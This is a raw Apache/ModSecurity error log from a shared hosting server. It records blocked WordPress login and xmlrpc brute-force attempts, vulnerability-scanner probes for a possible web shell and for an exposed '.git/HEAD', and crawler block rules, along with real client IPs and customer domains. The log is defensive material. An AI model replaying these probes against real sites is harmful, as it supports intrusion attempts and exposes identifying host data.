[Tue May 26 17:21:01.440803 2026] [security2:error] [pid 869189:tid 869380] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWJJdB5TZSn88J_oroPXgAAADw"]
[Tue May 26 17:21:01.441210 2026] [security2:error] [pid 869189:tid 869374] [client 66.249.64.96:64718] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWJJdB5TZSn88J_oroPUwAAADY"]
[Tue May 26 17:21:02.483097 2026] [security2:error] [pid 869189:tid 869351] [client 223.235.98.214:9680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJJtB5TZSn88J_oroPfgAAAB8"]
[Tue May 26 17:21:02.483898 2026] [security2:error] [pid 869189:tid 869351] [client 223.235.98.214:9680] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJJtB5TZSn88J_oroPfgAAAB8"]
[Tue May 26 17:21:02.774444 2026] [security2:error] [pid 869189:tid 869371] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJJtB5TZSn88J_oroPdAAAADM"]
[Tue May 26 17:21:02.937795 2026] [proxy:error] [pid 869189:tid 869360] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:21:02.937852 2026] [proxy_http:error] [pid 869189:tid 869360] [client 142.248.80.70:54914] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:21:02.938431 2026] [proxy:error] [pid 869189:tid 869360] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:21:02.938464 2026] [proxy_http:error] [pid 869189:tid 869360] [client 142.248.80.70:54914] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:21:04.968999 2026] [security2:error] [pid 869189:tid 869428] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJKNB5TZSn88J_oroPtgAAAGw"]
[Tue May 26 17:21:06.812374 2026] [security2:error] [pid 869189:tid 869375] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJKtB5TZSn88J_oroP4QAAADc"]
[Tue May 26 17:21:07.794079 2026] [security2:error] [pid 869189:tid 869395] [client 202.76.168.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJK9B5TZSn88J_oroP_wAAAEs"]
[Tue May 26 17:21:07.874639 2026] [security2:error] [pid 869189:tid 869276] [remote 113.190.40.93:30042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahWJK9B5TZSn88J_oroQDAAAIlU"]
[Tue May 26 17:21:08.435383 2026] [security2:error] [pid 869189:tid 869330] [client 203.194.101.7:64575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJLNB5TZSn88J_oroQGQAAAAo"]
[Tue May 26 17:21:08.435515 2026] [security2:error] [pid 869189:tid 869330] [client 203.194.101.7:64575] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJLNB5TZSn88J_oroQGQAAAAo"]
[Tue May 26 17:21:09.795498 2026] [security2:error] [pid 869189:tid 869379] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJLdB5TZSn88J_oroQQgAAADs"]
[Tue May 26 17:21:11.373870 2026] [autoindex:error] [pid 869189:tid 869363] [client 45.148.10.204:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:21:11.437942 2026] [security2:error] [pid 869189:tid 869332] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJL9B5TZSn88J_oroQZgAAAAw"]
[Tue May 26 17:21:11.593475 2026] [security2:error] [pid 869189:tid 869302] [remote 5.42.158.148:43510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWJL9B5TZSn88J_oroQcwAAN28"]
[Tue May 26 17:21:12.212250 2026] [security2:error] [pid 869189:tid 869341] [client 185.191.171.7:28952] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2025-03-18/"] [unique_id "ahWJMNB5TZSn88J_oroQigAAABU"]
[Tue May 26 17:21:12.212347 2026] [security2:error] [pid 869189:tid 869341] [client 185.191.171.7:28952] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2025-03-18/"] [unique_id "ahWJMNB5TZSn88J_oroQigAAABU"]
[Tue May 26 17:21:12.945968 2026] [security2:error] [pid 869189:tid 869417] [client 223.235.98.214:17554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJMNB5TZSn88J_oroQlwAAAGE"]
[Tue May 26 17:21:12.946126 2026] [security2:error] [pid 869189:tid 869417] [client 223.235.98.214:17554] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJMNB5TZSn88J_oroQlwAAAGE"]
[Tue May 26 17:21:14.338644 2026] [security2:error] [pid 869189:tid 869322] [client 185.191.171.12:53492] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWJMtB5TZSn88J_oroQuQAAAAI"]
[Tue May 26 17:21:14.338786 2026] [security2:error] [pid 869189:tid 869322] [client 185.191.171.12:53492] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWJMtB5TZSn88J_oroQuQAAAAI"]
[Tue May 26 17:21:14.654425 2026] [security2:error] [pid 869189:tid 869441] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJMtB5TZSn88J_oroQuAAAAHk"]
[Tue May 26 17:21:15.052177 2026] [security2:error] [pid 869189:tid 869287] [remote 18.190.7.192:43024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWJMtB5TZSn88J_oroQwQAAEmA"]
[Tue May 26 17:21:15.476334 2026] [security2:error] [pid 869189:tid 869266] [remote 74.7.241.58:60890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWJM9B5TZSn88J_oroQywAAb0s"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:21:16.720982 2026] [security2:error] [pid 869189:tid 869380] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJNNB5TZSn88J_oroQ2gAAADw"]
[Tue May 26 17:21:16.731453 2026] [core:error] [pid 869189:tid 869446] [client 198.235.24.245:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:21:16.731473 2026] [core:error] [pid 869189:tid 869446] [client 198.235.24.245:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:21:18.676312 2026] [security2:error] [pid 869189:tid 869432] [client 203.194.101.7:64944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJNtB5TZSn88J_oroRKgAAAHA"]
[Tue May 26 17:21:18.676482 2026] [security2:error] [pid 869189:tid 869432] [client 203.194.101.7:64944] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJNtB5TZSn88J_oroRKgAAAHA"]
[Tue May 26 17:21:19.073209 2026] [security2:error] [pid 869189:tid 869365] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJNtB5TZSn88J_oroRKQAAAC0"]
[Tue May 26 17:21:19.753518 2026] [security2:error] [pid 869189:tid 869253] [remote 121.200.216.55:55276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJN9B5TZSn88J_oroRSQAAOz4"]
[Tue May 26 17:21:21.454882 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJOdB5TZSn88J_oroRdgAAAHg"]
[Tue May 26 17:21:22.062000 2026] [security2:error] [pid 869189:tid 869354] [client 184.73.167.217:3218] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahWJOtB5TZSn88J_oroRjwAAACI"]
[Tue May 26 17:21:22.205498 2026] [security2:error] [pid 869189:tid 869443] [client 74.7.241.184:47474] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "lagoslawntennisclub1895.com"] [uri "/robots.txt"] [unique_id "ahWJOtB5TZSn88J_oroRkwAAeys"]
[Tue May 26 17:21:23.466717 2026] [security2:error] [pid 869189:tid 869389] [client 223.235.98.214:31734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJO9B5TZSn88J_oroRvQAAAEU"]
[Tue May 26 17:21:23.466879 2026] [security2:error] [pid 869189:tid 869389] [client 223.235.98.214:31734] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJO9B5TZSn88J_oroRvQAAAEU"]
[Tue May 26 17:21:23.797344 2026] [security2:error] [pid 869189:tid 869400] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJO9B5TZSn88J_oroRuQAAAFA"]
[Tue May 26 17:21:23.936014 2026] [security2:error] [pid 869189:tid 869413] [client 216.73.161.117:39945] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahWJO9B5TZSn88J_oroRvgAAAF0"]
[Tue May 26 17:21:26.028979 2026] [security2:error] [pid 869189:tid 869423] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJPdB5TZSn88J_oroR_AAAAGc"]
[Tue May 26 17:21:28.369513 2026] [security2:error] [pid 869189:tid 869401] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJP9B5TZSn88J_oroSOgAAAFE"]
[Tue May 26 17:21:28.658065 2026] [http2:info] [pid 882219:tid 882219] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:21:28.921205 2026] [security2:error] [pid 869189:tid 869384] [client 203.194.101.7:65349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJQNB5TZSn88J_oroSRQAAAEA"]
[Tue May 26 17:21:28.921377 2026] [security2:error] [pid 869189:tid 869384] [client 203.194.101.7:65349] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJQNB5TZSn88J_oroSRQAAAEA"]
[Tue May 26 17:21:30.283858 2026] [security2:error] [pid 882219:tid 882312] [remote 88.198.165.116:34550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJQp8tTkZcqimiXcTl9QAAr1w"]
[Tue May 26 17:21:30.713783 2026] [security2:error] [pid 882219:tid 882406] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJQp8tTkZcqimiXcTl_gAAAL4"]
[Tue May 26 17:21:32.068250 2026] [security2:error] [pid 882219:tid 882316] [remote 41.111.171.131:50466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJQ58tTkZcqimiXcTmLAAAnmA"]
[Tue May 26 17:21:32.620771 2026] [security2:error] [pid 882219:tid 882408] [client 52.0.63.151:7479] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "canopykaapi.com"] [uri "/product/kaati-%E0%B2%95%E0%B2%BE%E0%B2%9F%E0%B2%BF/"] [unique_id "ahWJRJ8tTkZcqimiXcTmPgAAAMA"]
[Tue May 26 17:21:33.124259 2026] [security2:error] [pid 882219:tid 882422] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJRJ8tTkZcqimiXcTmRAAAAM4"]
[Tue May 26 17:21:34.307702 2026] [security2:error] [pid 882219:tid 882414] [client 223.235.98.214:18266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJRp8tTkZcqimiXcTmXwAAAMY"]
[Tue May 26 17:21:34.307829 2026] [security2:error] [pid 882219:tid 882414] [client 223.235.98.214:18266] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJRp8tTkZcqimiXcTmXwAAAMY"]
[Tue May 26 17:21:35.174083 2026] [security2:error] [pid 882219:tid 882463] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJRp8tTkZcqimiXcTmcQAAAPc"]
[Tue May 26 17:21:36.535022 2026] [security2:error] [pid 882219:tid 882415] [client 14.190.129.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJSJ8tTkZcqimiXcTmlwAAAMc"]
[Tue May 26 17:21:37.890392 2026] [security2:error] [pid 882219:tid 882377] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJSZ8tTkZcqimiXcTmuQAAAKE"]
[Tue May 26 17:21:37.906307 2026] [security2:error] [pid 882219:tid 882336] [remote 167.71.130.119:47476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWJSZ8tTkZcqimiXcTmwQAAnXQ"]
[Tue May 26 17:21:39.627233 2026] [security2:error] [pid 882219:tid 882363] [client 74.7.241.164:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahWJS58tTkZcqimiXcTm8QAAAJM"]
[Tue May 26 17:21:39.627921 2026] [security2:error] [pid 882219:tid 882395] [client 74.7.241.164:45212] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWJS58tTkZcqimiXcTm7wAAsww"]
[Tue May 26 17:21:39.718036 2026] [security2:error] [pid 882219:tid 882400] [client 74.7.244.29:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.strapptech.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWJS58tTkZcqimiXcTm-wAAALg"]
[Tue May 26 17:21:39.718702 2026] [security2:error] [pid 882219:tid 882382] [client 74.7.244.29:34852] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.strapptech.com"] [uri "/robots.txt"] [unique_id "ahWJS58tTkZcqimiXcTm-QAApg4"]
[Tue May 26 17:21:40.077044 2026] [security2:error] [pid 882219:tid 882385] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJS58tTkZcqimiXcTm9AAAAKk"]
[Tue May 26 17:21:40.669387 2026] [security2:error] [pid 882219:tid 882444] [client 203.194.101.7:49298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJTJ8tTkZcqimiXcTnEwAAAOQ"]
[Tue May 26 17:21:40.669544 2026] [security2:error] [pid 882219:tid 882444] [client 203.194.101.7:49298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJTJ8tTkZcqimiXcTnEwAAAOQ"]
[Tue May 26 17:21:40.734929 2026] [security2:error] [pid 882219:tid 882416] [client 87.106.152.203:60942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kexcouriers.com"] [uri "/images/images/cache.php"] [unique_id "ahWJTJ8tTkZcqimiXcTnGgAAAMg"], referer: www.google.com
[Tue May 26 17:21:41.120422 2026] [security2:error] [pid 882219:tid 882238] [remote 84.247.181.196:57114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWJTJ8tTkZcqimiXcTnIQAAuhI"]
[Tue May 26 17:21:41.594067 2026] [security2:error] [pid 882219:tid 882387] [client 98.159.226.60:62629] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "pronumbers.com.au"] [uri "/.git/HEAD"] [unique_id "ahWJTZ8tTkZcqimiXcTnMQAAAKs"]
